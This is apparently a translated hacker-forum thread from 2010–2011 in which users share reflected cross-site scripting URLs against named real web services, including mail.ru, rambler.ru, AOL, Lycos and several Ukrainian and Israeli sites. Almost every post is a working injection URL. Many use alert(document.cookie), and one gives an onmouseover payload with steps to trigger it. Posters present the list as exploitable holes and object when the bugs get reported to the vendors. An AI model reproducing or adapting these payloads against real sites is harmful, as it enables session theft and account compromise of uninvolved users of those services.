Passive XSS on mail servers

Discussion in 'Mail service vulnerabilities' started by Constantine, 25 Oct 2008.

  1. Фараон

    http://wap.ks.korrespondent.net/search.php?keyword=><script>alert('Speciall y for the Antichat')<%2Fscript>
     
    #121 Фараон, 1 Dec 2010
    Last edited: 1 Dec 2010
    1 person likes this.
  2. ~d0s~

    job.gala.net
    Code:
    http://job.gala.net/cgi-bin/faq.cgi?do=add-question&branch_id=21&razdel_id=21&email="><script>alert('xz che za')</script>
     
    1 person likes this.
  3. ~d0s~

    meta.ua
    Code:
    http://meta.ua/feeds/weather.asp?city=<script>alert(document.cookie)</script>
    Yesterday there was one in the search too, but I didn't get around to posting it; today I came back and it no longer works, so there's a good chance this one will be fixed soon as well :(
     
    1 person likes this.
  4. ~d0s~

    game.km.ru
    Code:
    http://game.km.ru/magazin/lenta.asp?idRubr=1&order="><script>alert('d0s')</script>&search=xD
     
    1 person likes this.
  5. ~d0s~

    wap.afisha.mail.ru
    Code:
    http://wap.afisha.mail.ru/event.html/"><script>alert(document.cookie)</script>
    upd: Someone leaked it to them :mad:
    I'll post a few more on Mail in the coming days.
     
    #125 ~d0s~, 13 Dec 2010
    Last edited: 13 Dec 2010
    1 person likes this.
  6. ~d0s~

    wap.rambler.ru
    Code:
    http://wap.rambler.ru/geo/?back="><script>alert(123)</script>
     
    1 person likes this.
  7. Ruslan1817

    All the bugs get closed quickly because Mail employees monitor threads like this.
     
    2 people like this.
  8. ~d0s~

    teentoday.mail.everyone.net/
    Code:
    http://teentoday.mail.everyone.net/email/scripts/loginuser.pl/"><script>alert(123)</script>
    I hadn't heard of this mail service; I dug it up in a listing of foreign e-mail services. If something's not right, delete it :)
     
  9. Uex Urgent

    The XSS works and is in working form, and if you can figure out why it didn't work for you, or did, then you're hackers))))

     
    4 people like this.
  10. eclipse

    http://my-mail.co.il
    Code:
    http://my-mail.co.il/wm/mail/login2.html?user="><script>alert('XSS')</script>
     
    #130 eclipse, 20 Dec 2010
    Last edited: 20 Dec 2010
    2 people like this.
  11. ~d0s~

    mail2000.ru
    Code:
    http://mail2000.ru/ya.php?query="><script>alert(document.cookie)</script>
     
    1 person likes this.
  12. eclipse

    Code:
    http://www.virtualjerusalem.com/news.php?Itemid="><script>alert(/xss/)</script>
     
    #132 eclipse, 22 Dec 2010
    Last edited: 22 Dec 2010
    1 person likes this.
  13. ~d0s~

    smallbusiness.aol.com
    Code:
    http://smallbusiness.aol.com/search/?q=<script>alert(document.cookie)</script>
     
    1 person likes this.
  14. eclipse

    lycos.com

    Code:
    https://registration.lycos.com/forgot.php/%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E
    mail.infobox.ru
    Code:
    http://mail.infobox.ru/redirect.php?login_username="><script>alert(/xss/)</script>&secretkey="><script>alert(/xss/)</script>&js_autodetect_results=1&just_logged_in=1&lng=ru_RU&lng=ru_RU
     
    #134 eclipse, 24 Dec 2010
    Last edited: 24 Dec 2010
    2 people like this.
  15. ~d0s~

    music.aol.com
    Code:
    http://music.aol.com/pictures/search/?cat=photo&query=<script>alert(document.cookie)</script>
     
    #135 ~d0s~, 26 Dec 2010
    Last edited: 26 Dec 2010
    1 person likes this.
  16. ~d0s~

    xakep.ru
    Code:
    http://xakep.ru/local/search/result.asp?tosearch=</title><script>alert(document.cookie)</script>
     
    8 people like this.
  17. NemTaq

    aboutmail.ru

    http://www.aboutmail.ru/?option=com_performs&formid=1

    Vulnerable fields:
    Your name: *
    Your EMail: *
    Subject: *

    //add an example.
     
    #137 NemTaq, 17 Jan 2011
    Last edited by a moderator: 18 Jan 2011
    2 people like this.
  18. Uex Urgent

    Not a mail service, but the XSS is a cutie :rolleyes:

     
    1 person likes this.
  19. Sevak

    Mail.am: PR - 4


    Code:
    http://realty.mail.am/index.php?page=view_2&tp_tp=\%22%3E%3Cscript%3Ealert%28/xss/%29%3C/script%3E&return=0&realty
     
  20. Sevak

    Mail.ru



    Code:
    http://zhuki.mail.ru/?register=2&form[nick]=%27onmouseover=%27alert%28/xss/%29;%27%20name=%272
    Code:
    After following the link, hover the mouse over the radio button
     
    #140 Sevak, 30 Apr 2011
    Last edited: 30 Apr 2011
    2 people like this.